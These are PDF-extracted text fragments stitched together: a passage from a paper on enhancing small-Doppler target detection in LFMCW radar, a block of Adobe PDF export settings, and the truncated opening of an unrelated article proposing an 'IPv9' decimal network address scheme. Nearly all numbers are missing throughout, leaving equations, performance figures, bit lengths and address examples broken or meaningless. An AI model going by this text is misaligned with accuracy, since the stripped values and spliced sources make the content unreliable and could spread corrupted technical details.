ramp respectively. therefore, beat frequency (fb) can be obtained in the spectrum of the baseband signal as: fb ¼ � ro c : b t þ fcv c ( ) the relation between the beat frequency (fb) and range (r) for fixed target is given by komarov & smolskiy ( ) and levanon & mozeson ( ) fb ¼ rfmΔf c ( ) where fm is the modulated frequency, Δf is the receiver bandwidth and c is speed of light. extraction of target information such as range and speed based on d-fft is illustrated as shown in fig. . according to the traditional algorithm for lfmcw radar, the spectrum of received radar signal is processed using fft in range direction followed by fft in doppler direction. the output of second fft is applied to cfar processor to make a decision for target detection. one of enhancement method for target detection using sdlc-mti followed by integrator (ahmed, ) is illustrated in fig. . the frequency response of sdlc mti is multiplied with that of single delay line integrator (sdli) as shown in fig. . figure a represents the realization of stable sdli and fig. b illustrates its frequency response at different values of gain (a). this structure has a good performance for slowly targets with small doppler frequencies but has a bad evaluation for middle doppler targets. this problem has been enhanced in ahmed ( ) but with combined structure of the traditional algorithm (mti with d-fft processor) and the sdli with doppler fft as shown in fig. . the problem of this combination is the complexity which uses extra doppler fft processor in addition to sdli processor. this problem can be overcame using the proposed processor or filter instead of high complexity as discussed in the next section. ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the proposed processor due to shortage of sdlc/sdli algorithm in middle doppler targets and expected high complexity in combination structure, the proposed processor is used to overcome this problem beside enhancement of off-pin targets as shown in fig. . the integrator of sdlc/sdli has a stabilization factor, a, of one to ensure the system stability and the proposed filter is used as window function which multiply the figure lfmcw radar signal processing using d-fft. full-size doi: . /peerj-cs. /fig- figure block diagram of sdlc. block diagram of sdlc/sdli algorithm. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure single delay line integrator structure. (a) stable realization. (b) frequency response at different values of a. full-size doi: . /peerj-cs. /fig- figure lfmcw radar processor based on sdlc. lfmcw radar processor based on sdlc/sdli processor. full-size doi: . /peerj-cs. /fig- figure block diagram of lfmcw radar with the combined structure. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ incoming signal in time domain with the window function under consideration of same lengths. this multiplication in time domain can be obtained using convolution in frequency domain as in this case which spectral signal is more interest due to using fft. the coefficients of the proposed filter is chosen to be and − . to solve the problem of middle doppler frequencies. the proposed filter is chosen a head of first fft processor which acts as a window function to ensure high detection capability before range-doppler processor. the realization of this filter is illustrated as in fig. . for the proposed filter, the difference equation can be written as: y nð Þ ¼ x nð Þ � : x n � ð Þ ( ) where x(n) and y(n) represent the output of fft processor and the output of the proposed filter respectively. the transfer function of the proposed filter can be written as: y zð Þ ¼ x zð Þ � : z� � � figure general block diagram of lfmcw radar using the proposed processor. full-size doi: . /peerj-cs. /fig- figure realization of the proposed filter processor. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, h zð Þ ¼ � : z� ( ) the proposed filter is chosen to enhance the detection capability of middle doppler target velocities which improved using maximization process in ahmed ( ) with approximately high complexity compared with that of the proposed filter. the simulation of the proposed processor performance and both sdlc/sdli processor and the traditional algorithm based on mti only is achieved and discussed in the next section. computer simulation performance of the proposed processor is evaluated using simulation based on matlab program. the performance is compared with that of both the traditional one and sdlc/sdli algorithm under the same conditions. it is assumed that, the generation waveform is sawtooth with the central frequency of lfmcw radar (fc) is ghz, bandwidth (b) is mhz, modulation period (tm) is μsec, number of range cells is , cells and number of doppler cells is cells. comparison between the proposed processor and the traditional one which uses d-fft processor is achieved as shown in fig. . to study the effect of the proposed filter, two scenarios could be applied. first one, for off-pin targets and the other for middle-pin targets. the simulation is performed for these cases under the same conditions to verify a fair comparison. off-pin targets the proposed filter has a great performance on the off-pin target detection. assume a target in doppler velocity equals ( . / )fm which is off-pin target which lies between doppler velocities ( / )fm and ( / )fm. the target can appear as two targets as in fig. a using the traditional algorithm. but after applying the proposed filter, the target is located at one pin only (at pin number ) or with doppler velocity equals ( / )fm as in fig. b which indicates that, the proposed filter can resolve the problem of off-pin targets and therefore enhance the signal detection. figure block diagram of the proposed processor compared with the traditional d-fft processor. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ middle-pin targets to evaluate the effect of the proposed filter on the traditional algorithm, a set of moving targets are presented at different doppler frequencies in noiseless environment ( / , / , / , / , / , / , / , / , / ) × fm. figure illustrates sdlc/sdli processor response compared with the traditional algorithm at different doppler frequencies. it is found that, there are no enhancement in target detection especially for middle-pin targets. figure represents the response of the proposed algorithm based on the designed filter processor compared with the traditional one at different doppler frequencies. it is clear that, the proposed processor based on filtering of the signal spectrum has a good performance for both off-pin targets and middle-pin targets compared with both the traditional and sdlc/sdli processor due to using the maximization selection. another aspect to evaluate the proposed processor is the detection performance using roc curve at different doppler frequencies as shown in figs. and . it is clear that, from fig. , the detection performance of the proposed processor is enhanced compared with both the traditional and sdlc/sdli processor by nearly db of slc/sdli processor and about db of the traditional algorithm at slow doppler target velocity of ( / )fm. figure illustrates that, the detection of the target enhanced figure response of fft algorithm. (a) before the proposed filter. (b) after the proposed filter. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using the proposed processor by nearly db of slc/sdli processor and about db of the traditional algorithm at middle doppler target velocity of ( / )fm. hardware implmentation the implementation of the proposed processor is very important using fpga which indicates that it can operate in real-time applications. the implementation is designed for the processing stage which includes; dechirping process of swatooth signal, d-fft processor, proposed filter, mti, sdlc/sdli and cfar detection. xilinx kc dsp kit is used for implementation which includes kintex xc k t fpga chip which has , logic cell, dsp slices and about kbit ram (challenges & solutions, ). fpga board is equipped with an fmc daughter board that contains ti’s ads p / ads dual-channel -bit msps adc and ti’sdac dual channel -bit msps dac on a daughter board (abaco systems, ). the fft core parameters are figure response of the proposed processor. response of the proposed processor compared with the traditional one at different doppler frequencies. full-size doi: . /peerj-cs. /fig- figure response of sdlc. response of sdlc/sdli processor compared with the traditional one at different doppler frequencies. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure roc of the proposed processor for middle doppler target. roc of the proposed processor compared with that of sdlc/sdli and the traditional algorithms for middle doppler target at pfa of − . full-size doi: . /peerj-cs. /fig- figure roc of the proposed processor for slow doppler target. roc of the proposed processor compared with that of sdlc/sdli and the traditional algorithms for slow doppler target at pfa of − . full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chosen to be; number of samples, input data width is bits, phase factor width is bits, and pipelined streaming, i/o is used. the hardware implementation is performed for both the proposed processor and traditional algorithm which based on sdlc/sdli. two targets are simulated at doppler velocity of pin ( / ) and the other target located at doppler frequency pin number ( / ) as shown in figs. and . from these figures, it is clear that, the output of the proposed processor can improve the slowly moving figure response of the proposed processor compared with that of both sdlc/sdli and traditional algorithms using fpga. full-size doi: . /peerj-cs. /fig- figure simulation results of target detection using fpga. (a) traditional algorithm. (b) proposed processor. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ target without any effect of other targets. the hardware specifications using xilinx kc dsp kit is summarized in table . the verification of the implementation is performed using chip scope for the two processors as shown in fig. . it is found that, the chip scope results met the simulation results as discussed before. conclusion in this article, detection of targets with small doppler frequencies has been enhanced using a proposed processor. the enhancement has performed based on filtering process focusing on the detection based on the traditional algorithm using d-fft processor and sdlc/sdli processor. there are two main problems for target detection with small doppler frequencies; first one, is the off-pin target detection which traditional algorithm cannot distinguish between these targets. the proposed processor can resolve this problem. second problem, is the detection of middle-pin targets which is the main problem for sdlc/sdli processor and this case has been overcame using maximization table fpga utilization resources of the proposed processor. hardware resources available resources used utilization (%) slice registers , , slice luts , , ramb e /fifo e s ramb e /fifo e s dsp e s figure chip scope result of the proposed processor. chip scope result of the proposed processor, sdlc/sdli and traditional responses. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ process but it suffer from high complexity. so, this problem can be resolved using the proposed algorithm based on a proposed filter as a head of the first fft processor with less complexity compared with maximization process. the performance of the proposed processor is examined compared with that of the traditional one and sdlc/sdli processor through these two points. the detection performance of these targets can be evaluated using roc curves at different target velocities and at low probability of false alarm. it is found that, the detection performance of the proposed processor is enhanced by nearly db of slc/sdli processor and about nearly db of the traditional algorithm at slow doppler target velocity and about nearly db of slc/sdli processor and db of the traditional algorithm at middle-doppler target velocity. the implementation of the proposed processor is achieved using fpga and chip scope. it is found that, it meets the simulation results. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � sameh ghanem conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abaco systems. . fmc for digital signal processing. austin: abaco systems. ahmed fm. . detection of targets with small apparent doppler frequencies in lfmcw radars. in: iop conference series: materials science and engineering. bristol: iop publishing ltd, . challenges d, solutions x. . kintex- fpga kc evaluation kit: versatile, high- performance base platform shortens time to market for series designs. san jose: xilinx, inc. hossiny mh, salem sg, ahmed fm, moustafa kh. . enhance lfmcw radar detection and complexity using adaptive recovery camp algorithm. in: first international workshop on deep and representation learning. cairo. piscataway: ieee, – . komarov iv, smolskiy sm. . fundamental of short range fm radar. norwood: artech house. ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee ms, kim yh. . design and performance of a -ghz switch-antenna array fmcw radar system for automotive applications. ieee transactions on vehicular technology ( ): – doi . /tvt. . . levanon n, mozeson e. . radar signals. hoboken: john wiley & sons, inc. salem sg, ahmed fm, ibrahim mh, elbardawiny ah. . a proposed compressive sensing based lfmcw radar signal processor. international journal of engineering research & technology ( ):p –p . salem sg, ahmed fm, ibrahim mh, elbardawiny arh, elgayar s. . design and implementation of a new approach of lfmcw radar signal processing based on compressive sensing in azimuth direction. in: ieee radar conference (radarconf), philadelphia, pa, piscataway: ieee, – doi . /radar. . . skolnik mi. . introduction to radar systems. new york: third edition. winkler v. . range doppler detection for automotive fmcw radars. in: european radar conference. piscataway: ieee, – . ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tvt. . http://dx.doi.org/ . /radar. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ enhancement of small doppler frequencies detection for lfmcw radar introduction lfmcw radar detection and processing the proposed processor computer simulation hardware implmentation conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , design and research of new network address coding lai yufeng . state and provincial joint engineering lab. of advanced network, monitoring and control, china . school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com xie jianping . chinese decimal network working group shanghai, china . shanghai decimal system network information e-mail: @ .cn cheng xiaowei . chinese decimal network working group shanghai, china . shanghai decimal system network information e-mail: xewei.cheng@em .net li yuyu shandong radio, television and network co., ltd. tai 'an branch e-mail: tagdjsb@ .com abstract—to solve a series of problems caused by address space and information security of contemporary internet, chinese scientists have proposed a new generation of network architecture. since the release of ipv rfc in , it has become the first widely used internet of things protocol due to its characteristics of easy implementation and good operability. it constitutes the basic protocol of current internet technology. however, due to the defects in address classification, address resources are largely wasted. as the scale of the internet continues to grow, especially the number of addresses used to surge, the address shortage has limited the internet further development. ipv has solved the problem of insufficient ipv addresses to some extent, but it is not widely for more than years used because it integrates the information of physical layer and application layer, which confuses the network layer and brings many security risks. based on the study of ipv and ipv , this paper proposes a new generation network architecture, which is designed from the aspects of addressing model, address writing, address prefix writing and address type. the address structure is compatible with ipv and ipv , so that the previous design results can be retained, fundamentally solve the space address and information security issues, and provide a new solution for the next generation of internet applications and research. keywords-network architecture; the network address; ipv ; ipv ; ipv preface because ipv addresses are allocated on a first-come-first-served, on-demand basis, the distribution imbalance makes address allocation flawed. with the continuous development of the internet (especially the explosive growth of the scale and the surge of address use), some inherent defects of ipv are gradually exposed, mainly focusing on address shortage. ipv does not provide encryption and authentication mechanisms to ensure the secure transmission of confidential data resources and other aspects. although the use of nat ("network address translation"), cidr ("classless inter-domain routing") and other technologies can alleviate the ipv doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , crisis to some extent. but in fact, it has not fundamentally solved the problem. at the same time, it will bring new problems in cost, quality of service, security and other aspects, posing greater challenges. to solve the problem of insufficient ipv addresses, scientists proposed ipv .however, due to the limitations of the technology era, there are many defects in the design of ipv address structure. not satisfied with the -bit address length, the designers did not follow the principle of transparency between different protocol layers and added the physical layer address and the application layer in the design of ipv address segment (the protocol of the network layer), which led to a series of fatal problems. "ipv " is an idea proposed in the early s by the ietf (the internet engineering task force) in the june issue of rfc to address the deficiencies in internet address domain names.in may , ietf unilaterally abandoned its cooperation with iso (international organization for standardization), disbanded tuba, the institute for ipv research, and terminated its organized research and development activities for ipv . however, no intellectual property rights and valuable technical data were formed in this research. inspired by rfc , xie jianping, a chinese expert, formed the chinese ipv research and development team with shanghai general chemical technology research institute as the gathering center. the difference between uppercase and lowercase indicates that the ipv developed in china is not a technical version following the internet. ip version (ipv ) is a new version of the internet protocol, also known as the decimal network, digital domain name. the decimal network technology protocol is developed independently by our country. the emergence of ipv fundamentally solves the problems of insufficient address and network security. i. new network address ipv a. network address internet addresses are assigned by icann(the internet corporation for assigned names and numbers ) .the association appoints three local organizations for the assignment of addresses: internic for north america, ripencc for europe and apnic for the asia pacific region. the purpose of uniform allocation is to ensure that the network address has global uniqueness, and the host address is assigned by the system administrator of each network. therefore, the uniqueness of the network address and the host address within the network ensures the uniqueness of the ip address. b. ipv ipv decimal network/digital domain name system (ipv ).based on the study of ipv and ipv , the following changes are proposed. ipv expands the address length to bits, reduces the network overhead by means of indefinite length and non-location, and guarantees the network security. this article defines the ipv address architecture, including a detailed description of the currently defined ipv address format. c. ipv header format the format design of ipv system header is shown in table . international journal of advanced network, monitoring and controls volume , no. , table i. ipv header format version number communication stream type stream label address length priority class traffic address the authentication absolute traffic payload length next head hop limit source address ( - bit ) destination address ( - bit ) time authentication code the design of table is explained below. ) version: -bit length, internet protocol version number. for ipv , this field must be . ) category: bits in length. bits high is used to specify the address length, the value is ~ , is the power of , the address length is byte ~ byte; the default value is bits. among them, is bits, is bits, is bits, is bits, is bits, is bits, is bits, is bits. the last five bits specify the communication class and authentication for the source and destination addresses. to is the priority value, where to is used to specify the priority class of the traffic; to are used to specify the communication method of authentication before communication. the address of packet sending is used for traffic control and whether authentication of source address and destination address is required. to are used to specify absolute traffic that will not fall back when congestion is encountered; for virtual circuits; and respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. other values are reserved for later use. ) flow label: with a length of bits, it is used to identify packages belonging to the same business flow. ) net load length: the length is bits, including the net load byte length, that is, the number of bytes contained in the packet after ipv header. ) next header: the length is bits. this field indicates the protocol type in the field following the ipv header. ) hop limit: the length is bits, and this field will be reduced by one every time a node forwards a packet. ) source address: -bit bit ~ -bit bit, specifying ipv packet sender address. use of variable length and location method. ) destination address: the length is bit ~ bit, and the destination address of ipv packet is specified. use of variable length and location method. ) time: used to control the lifetime of the address in the header. ) authentication code: it is used to identify the authenticity of the address in the header. ii. ipv address space a. type of address ipv addresses specify -bit identifiers for interfaces and interface groups. there are three types of addresses: ) unicast. a single interface has an identifier. a packet sent to a unicast address is passed to an interface identified by that address. ) arbitrary cast. typically, a set of interfaces belonging to different nodes has an identifier. a packet sent to an arbitrary cast address is passed to an interface identified by that address that is the closest measured by the routing protocol distance. international journal of advanced network, monitoring and controls volume , no. , ) multicast. typically, a set of interfaces belonging to different nodes has an identifier. a packet sent to a multicast address is passed to all interfaces at that address. there are no broadcast addresses in ipv , and its functionality is being replaced by multicast addresses. in this article, fields within the address are given a specified name, such as "user." when the name is followed by an identifier (such as "user id"), it is used to represent the content of the name field. when a name is used with a prefix (such as "user prefix"), it represents all addresses up to and including this field. in ipv , any fields that are all " " and all " " are valid values unless specifically excluded. in particular, the prefix can contain a " " value field or end with a " ". b. addressing model all types of ipv addresses are assigned directly to the interface, not to the node.ipv unicast addresses belong to a single interface. because each interface belongs to a single node, a node of multiple interfaces, any of its unicast addresses can be used as the identifier for that node. all interfaces need at least one link local unicast address. a single interface can specify multiple ipv addresses (unicast, arbitrary cast, multicast) or ranges of any type. unicast addresses with greater link range are not required for interfaces that go from non-neighbor or to non-neighbor and are not the origin or destination of any ipv packets. this is sometimes used for point-to-point interfaces. there is one exception to this addressing model: handle the case of multiple physical interface implementations. if the state that emerges in the internet layer is an interface, a unicast address or a group of unicast addresses can be assigned to multiple physical interfaces. this is useful for load-sharing across multiple physical interfaces. current ipv extends the ipv model, with a subset prefix associated with a link. multiple subset prefixes can be specified to the same link. iii. text representations of ipv addresses this article has developed a way to represent ipv addresses, including ―brackets decimal‖ representation, "curly braces" representation, and "parentheses" representation. a. brackets decimal the bracket decimal can be expressed in the following two ways: the first method: bits are represented by "[]".the bits in "[]" are expressed in decimal and can be written in indefinite length. and you can omit the "[]" when writing in the browser. the second method :the -bit ipv address representation is in the form of "y[y] [y] [y] [y] [y] [y]". each y represents a -bit portion of the address and is represented in decimal. = , so each ―y‖ is a decimal number of ten digits. each digit that is distinct from the decimal system ranges from to .for example, the range of the first digit from the left is to , so that there will be no overflow. for example: [ [ [ [ [ [ [ in address representation, multiple consecutive zeros to the left of each decimal number can be omitted, but a decimal number that is completely zero needs to be represented by a zero. for example, the above address can be written as: [ [ [ [ [ [ [ to simplify the representation of addresses, successive all-zero fields in the address can be replaced by a pair of square brackets "[x]" (x is the number of international journal of advanced network, monitoring and controls volume , no. , segments in the all-zero field).for example, the above address can be abbreviated as: [ [ ][ [ another example: [ [ [ [ [ [ [ can be abbreviated as [ ] [ [ [ [ [ [ [ can be abbreviated as [ ] b. decimal braces this method divides the -bit address into four -bit decimal numbers represented by curly braces separating them. the representation is in the form of "z}z}z}z", where each ―z‖ represents a -bit portion of the address and is represented in decimal. it's exactly the same as ―y‖, and it's compatible with ―y‖. you can mix the two. this greatly facilitates the current compatibility of these ipv addresses in ipv .such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]j.j.j.j; in particular, the last address format is the most useful. such as: } } } ] . . . you can write it like this: { } ] . . . finally, it should be noted that in symbolic representation, the brackets and curly braces are used without distinction. that is, "{" and"} ", "[" and"] "are not dissimilar, since this will not cause any side effects and is more convenient for users. c. parentheses representation since ipv has an address length of bits, whether you use four or eight segments, there are still many bits in each segment. for example, with an -segment representation, each segment still has bits. this is what happens in a paragraph: ……] ]… … ……] ]… … such a situation is not only cumbersome input, and it is easy to lose less or more, the user is not conducive to the number of dazzling.for convenience, the parenthesis representation -- (k/l) is introduced.where "k" means or and "l" means the number of or .in this way, the above two examples can be abbreviated as: ……]( / ) ]…… ……] ( / )]…… d. text representation of address prefixes the ipv address scheme is similar to the super netting and cidr schemes of ipv in that the address prefix is used to represent the network hierarchy. on the representation of ipv address prefix, a representation similar to cidr is adopted, which is as follows: ipv address/address prefixes length. where, ipv address is written in ipv address representation. the address prefix length is the length of consecutive bits that form the address prefix from the left. at this point, it is important to note that ipv addresses use decimal numbers, but prefix length refers to binary. therefore, prefixes must be calculated carefully. in binary numbers is not intuitive, after consideration, it is considered that the ipv address prefix can be converted to hexadecimal is easier to understand, but the ipv address is still expressed in decimal numbers. for example, the -bit address prefixes [ [ [ [ [ [ can be expressed as: [ [ [ [ [ [ [ / or [ ] [ [ [ / or [ [ [ [ [ [ ]/ or [ ] [ [ ]/ international journal of advanced network, monitoring and controls volume , no. , note that in the representation of the address prefix, the ipv address portion must be legal. the ipv address to the left of the slash ―/‖ must be restored to the correct address. in this address prefix, you can see that the address prefix is in length. so, the prefix is really just the first bits of the entire address plus the first bits of paragraph ( times + = ).so the key is in the seventh paragraph of the address. this paragraph is expressed in hexadecimal as:―********‖. because in hexadecimal, one digit is bit, the prefix includes only the first two ―*‖. knowing this, you know that the value of this segment is (hex) ~ ffffff (hex), or ~ in decimal. (or this paragraph may be expressed in binary as: ―**** **** **** **** **** **** **** ****‖. because in binary, one bit is one bit, so the prefix includes the first eight ―*‖, the range of values in this section is ~ that is, decimal ~ .) the ipv address portion can be generated by a pure address prefix by appending a to its right, or it can be a real ipv address that contains the address prefix. for example, the address prefix in the above example can also be expressed as: [ ] [ [a[b/ ―a‖ is any decimal number between and , and ―b‖ is any decimal number between and . iv. ipv address type ) pure ipv address the form of this address is y[y[y[y[y[y[y[y each y represents a decimal integer from to = ) ipv addresses compatible with ipv the form of the address is y[y[y[y[y[y[y[d.d.d.d each y represents a decimal integer from to = . d represents a decimal integer between and from the original ipv . ) ipv addresses compatible with ipv the form of this address is: y[y[y[y[x:x:x:x:x:x:x:x each y represents a decimal integer from to = .the x represents a hexadecimal number that originally ipv ranged from to ffff. ) special compatibility address in order to upgrade from ipv and ipv to ipv smoothly, some compatible addresses are designed. among them, some ipv addresses are designed to be compatible with ipv addresses. to smooth the transition to ipv addresses, prefix these addresses appropriately. in order to make their representation more intuitive and avoid errors caused by negligence in writing, the abbreviation method is introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d where, each ―y‖ represents the address as bits, represented in decimal. each ―x‖represents the original ipv address of bits, in hexadecimal. each ―d‖ represents the original ipv address of bits, expressed in decimal.such as: [ [ [ [ [ [ [ can be written as: [ [ [ [e : b: : f d:d : : . . . or: [ ] e : b: : f d:d : : . . . such as: [ [ [ [ [ [ [ can be written as:[ ]:: . . . (analysis: ":" is ipv address compression form of the representation, multiple blocks of a single continuous sequence by the double colon symbol "::".decimal is expressed as . . . in decimal.) international journal of advanced network, monitoring and controls volume , no. , ) [] full decimal address in order to facilitate the logistics code and decimal address application. category number is recommended. in the power of to the power of , the method of fixed length and non-positioning is adopted according to the application needs. ) ipv address of transition period ipv can be compatible with ipv and ipv technical protocols for the internet, but ipv and ipv technical protocols cannot be anti-compatible with ipv .the concept of compatibility is parallel coexistence, gradual and moderate transfer of applications and data services, rather than direct replacement or replacement of existing protocols. in order to solve the problem of ipv smooth transition to ipv , considering the existing internet has invested a lot of money so far, we specially designed ipv 's transition address, and took out a segment to allocate ipv .small changes can be made to the current system, where ipv has a section of j.j.j.j. where each j represents a decimal number from to which is to .where the previous [ ] can be omitted in the middle of the local address, that is, local users (or designated users) can use j.j.j.j. to directly use and the original ipv d.d.d.d. distinction.at the same time, this part of the user in order to smooth 